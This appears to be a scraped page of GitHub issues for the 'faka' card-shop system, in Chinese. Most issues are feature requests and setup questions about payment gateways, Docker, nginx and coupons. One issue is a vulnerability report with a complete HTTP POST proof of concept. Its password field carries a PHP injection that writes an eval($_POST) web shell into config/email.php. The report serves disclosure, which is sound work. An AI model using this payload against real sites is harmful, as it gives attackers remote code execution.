lizhipay / faka Goto Github PK

后台的地址/admin想改成其他名字不要用这个。可以如何修改呢

荔枝荔枝,超级需要码支付对接,跪谢

当前支付通道暂时关闭，如有疑问请联系客服（。・＿・。）ﾉ

建议： 能增加paypal付款吗？

请教下；composer install无法安装是怎么回事

Installing dependencies from lock file (including require-dev)
Verifying lock file contents can be installed on current platform.
Nothing to install, update or remove
Generating autoload files
16 packages you are using are looking for funding.
Use the composer fund command to find out more!

建议：新增docker部署方式

地址：https://pay.xunhuweb.com/
sdk：https://pay.xunhuweb.com/sdkdownload

感谢开发，我很喜欢这套发卡系统，如果能适配迅虎支付就更好了！拜托！

后台开启查询订单需要密码后，在用户界面查询订单后，卡密信息后面默认只有一个查看，点击后弹出提示框密码错误，然后才显示密码的输入框，建议查询卡密时默认就有密码输入框，让用户少点一次

Sorry for my bad english

English：
/admin/index/email (Requires admin rights) The setting password option in this location can write arbitrary content to /config/email.php to obtain website permissions
Chinese：
/admin/index/email （需要管理员权限） 后台修改email密码处可以getshell获取网站权限

POC：
POST /admin/api/config/editEmail HTTP/1.1
Host: www.lizhi.top
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko/20100101 Firefox/88.0
Accept: /
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 49
Origin: http://www.lizhi.top
Connection: close
Referer: http://www.lizhi.top/admin/index/email
Cookie: PHPSESSID=jedhau3007vnla9hjdv228ugdi

smtp=smtp.163.com&port=994&user=admin&pass=admin','test'=>"${@eval($_POST['a'])};",'a'=>'

有一次改了，弹出一个空白窗口，然后首页就报错了

可以加一个商品对接和分站，完全可以商业化运营了，东西真不错

代充商品有没有邮件提醒，比如用户下单后提醒用户已下单，等待管理员处理，同时给管理员发邮件提醒他处理订单，订单处理完后再发邮件给用户提醒他订单已处理完毕

设置好支付宝当面付后扫码支付完成后不跳转

因之前用的系统就有这个问题,没有查询订单密码,因此被人大量通过联系邮箱查询订单,获取卡密,希望能增加一个

我是php小白，能否提供一下nginx配置？

希望能有没有使用次数限制的优惠码，现在这个有数量限制的不方便发放。